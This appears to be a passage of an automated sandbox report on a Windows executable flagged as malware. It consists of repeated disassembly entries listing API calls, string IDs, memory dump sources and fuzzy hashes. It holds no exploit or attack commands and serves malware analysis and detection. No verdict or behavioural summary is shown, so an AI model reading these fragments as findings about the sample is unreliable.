                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                        • String ID:
                                                                        • API String ID: 1291720006-3916222277
                                                                        • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                        • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                        • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                        • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                        APIs
                                                                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                        • IsMenu.USER32(?), ref: 0045FC5F
                                                                        • CreatePopupMenu.USER32 ref: 0045FC97
                                                                        • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                        • String ID: 0$2
                                                                        • API String ID: 93392585-3793063076
                                                                        • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                        • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                        • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                        • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                        APIs
                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                        • VariantClear.OLEAUT32(?), ref: 00435320
                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                        • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                        • String ID: crts
                                                                        • API String ID: 586820018-3724388283
                                                                        • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                        • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                        • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                        • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                        APIs
                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe,0040F545,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe,004A90E8,C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe,?,0040F545), ref: 0041013C
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                        • _wcscat.LIBCMT ref: 0044BCAF
                                                                        • _wcslen.LIBCMT ref: 0044BCBB
                                                                        • _wcslen.LIBCMT ref: 0044BCD1
                                                                        • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                        • String ID: \*.*
                                                                        • API String ID: 2326526234-1173974218
                                                                        • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                        • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                        • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                        • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                        APIs
                                                                          • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                        • _wcslen.LIBCMT ref: 004335F2
                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                        • GetLastError.KERNEL32 ref: 0043362B
                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                        • _wcsrchr.LIBCMT ref: 00433666
                                                                          • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                        • String ID: \
                                                                        • API String ID: 321622961-2967466578
                                                                        • Opcode ID: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                                        • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                        • Opcode Fuzzy Hash: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                                        • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                        • API String ID: 1038674560-2734436370
                                                                        • Opcode ID: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                                        • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                        • Opcode Fuzzy Hash: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                                        • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                        • __lock.LIBCMT ref: 00417981
                                                                          • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                          • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                          • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                        • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                        • __lock.LIBCMT ref: 004179A2
                                                                        • ___addlocaleref.LIBCMT ref: 004179C0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                        • String ID: KERNEL32.DLL$pI
                                                                        • API String ID: 637971194-197072765
                                                                        • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                        • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                        • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                        • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$_malloc
                                                                        • String ID:
                                                                        • API String ID: 1938898002-0
                                                                        • Opcode ID: 0b38315dd5595bc9b6cdba2c23ba2101394e99cbfafbb6bdfa5f530b56cc0c70
                                                                        • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                        • Opcode Fuzzy Hash: 0b38315dd5595bc9b6cdba2c23ba2101394e99cbfafbb6bdfa5f530b56cc0c70
                                                                        • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                        • _memmove.LIBCMT ref: 0044B555
                                                                        • _memmove.LIBCMT ref: 0044B578
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                        • String ID:
                                                                        • API String ID: 2737351978-0
                                                                        • Opcode ID: acaa13feec575fcc8965567212d79990a10c5ddbc5928143d32797644f5f1a34
                                                                        • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                        • Opcode Fuzzy Hash: acaa13feec575fcc8965567212d79990a10c5ddbc5928143d32797644f5f1a34
                                                                        • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                        APIs
                                                                        • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                        • __calloc_crt.LIBCMT ref: 00415246
                                                                        • __getptd.LIBCMT ref: 00415253
                                                                        • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                        • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                        • _free.LIBCMT ref: 0041529E
                                                                        • __dosmaperr.LIBCMT ref: 004152A9
                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                        • String ID:
                                                                        • API String ID: 3638380555-0
                                                                        • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                        • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                        • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                        • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Copy$ClearErrorInitLast
                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                        • API String ID: 3207048006-625585964
                                                                        • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                        • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                        • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                        • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                        APIs
                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                        • inet_addr.WSOCK32(?), ref: 0046559B
                                                                        • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                        • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                        • _memmove.LIBCMT ref: 004656CA
                                                                        • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                        • WSACleanup.WSOCK32 ref: 00465762
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                        • String ID:
                                                                        • API String ID: 2945290962-0
                                                                        • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                        • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                        • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                        • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                        APIs
                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                        • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                        • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                        • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                        • String ID:
                                                                        • API String ID: 1457242333-0
                                                                        • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                        • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                        • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                        • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                        APIs
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ConnectRegistry_memmove_wcslen
                                                                        • String ID:
                                                                        • API String ID: 15295421-0
                                                                        • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                        • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
